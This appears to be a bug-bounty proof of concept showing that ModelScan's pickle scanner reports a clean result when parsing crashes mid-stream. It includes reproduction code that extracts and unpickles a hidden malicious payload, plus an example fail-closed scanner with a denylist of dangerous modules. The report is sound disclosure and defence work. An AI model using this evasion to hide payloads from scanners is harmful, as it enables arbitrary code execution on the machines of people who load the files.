# Scanner Bypass PoC
This is a security research submission for Huntr.
## Vulnerability

ModelScan's `scan_pickle_bytes()` has a logic bug: when `genops()` crashes part-way through a stream whose earlier opcodes reference only benign globals, the function returns `total_issues=0` and `errors=[]`. That result is indistinguishable from a clean file, even though the file still carries a malicious payload.
## File

`huntr_submission.pkl`: a malicious pickle that bypasses ModelScan completely.
## Scanner result (expected vs actual)

- Expected: `errors=[PickleGenopsError]`, `total_issues=0`
- Actual: `errors=[]`, `total_issues=0` ← CLEAN result
## Reproduction

```python
import pickle

from modelscan.modelscan import ModelScan

# Scan the submitted file: the parse failure is swallowed, so the report looks clean.
ms = ModelScan()
result = ms.scan("huntr_submission.pkl")
print(result["summary"]["total_issues"])  # → 0
print(result["errors"])                   # → []

# The bytes after the first 0xfe are a standalone pickle; loading them runs the payload.
with open("huntr_submission.pkl", "rb") as f:
    payload = f.read().split(b"\xfe")[1]
pickle.loads(payload)
# → executes malicious code
```
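As an added illustration (not ModelScan's code), the following minimal scanner shows the fail-closed behaviour the expected result above calls for: a `genops()` failure part-way through the stream is recorded as an error, so the file is never reported clean. The denylist, the result layout and the sample byte streams are constructed for this example.

```python
import pickletools

# Illustrative denylist (hypothetical; a real scanner keeps a curated, longer list).
UNSAFE_MODULES = {"os", "posix", "nt", "subprocess", "sys", "builtins", "__builtin__"}
STRING_OPS = {"STRING", "BINSTRING", "SHORT_BINSTRING",
              "UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}


def scan_pickle_bytes(data: bytes) -> dict:
    """Walk the opcode stream with pickletools.genops() and flag every global
    reference whose module is denylisted. A parser failure is recorded as an
    error (fail closed), so the result can never look like a clean file."""
    issues, errors, globals_seen, strings = [], [], [], []
    try:
        for opcode, arg, pos in pickletools.genops(data):
            if opcode.name in STRING_OPS:
                strings.append(arg)  # operands a later STACK_GLOBAL may consume
            ref = None
            if opcode.name in ("GLOBAL", "INST"):
                ref = tuple(arg.split(" ", 1))  # genops yields "module name"
            elif opcode.name == "STACK_GLOBAL" and len(strings) >= 2:
                ref = (strings[-2], strings[-1])  # simplified: ignores memo reuse
            if ref is not None:
                globals_seen.append(ref)
                if ref[0] in UNSAFE_MODULES:
                    issues.append(ref)
    except Exception as exc:  # unknown opcode, truncated stream, bad operand ...
        errors.append(f"PickleGenopsError: {exc} (globals before failure: {globals_seen})")
    return {"summary": {"total_issues": len(issues)},
            "issues": issues, "errors": errors, "globals": globals_seen}


def is_clean(result: dict) -> bool:
    """A file is clean only if it was scanned to the end AND nothing was flagged."""
    return result["summary"]["total_issues"] == 0 and not result["errors"]


# Constructed protocol-2 streams: PROTO, GLOBAL, EMPTY_TUPLE, REDUCE, then STOP or junk.
CLEAN = b"\x80\x02ccollections\nOrderedDict\n)R."
FLAGGED = b"\x80\x02cos\ngetcwd\n)R."  # harmless call, but the module is denylisted
MALFORMED = b"\x80\x02ccollections\nOrderedDict\n)R\xfe"  # 0xfe is not a pickle opcode

if __name__ == "__main__":
    for label, blob in (("clean", CLEAN), ("flagged", FLAGGED), ("malformed", MALFORMED)):
        res = scan_pickle_bytes(blob)
        print(label, res, "clean?", is_clean(res))
```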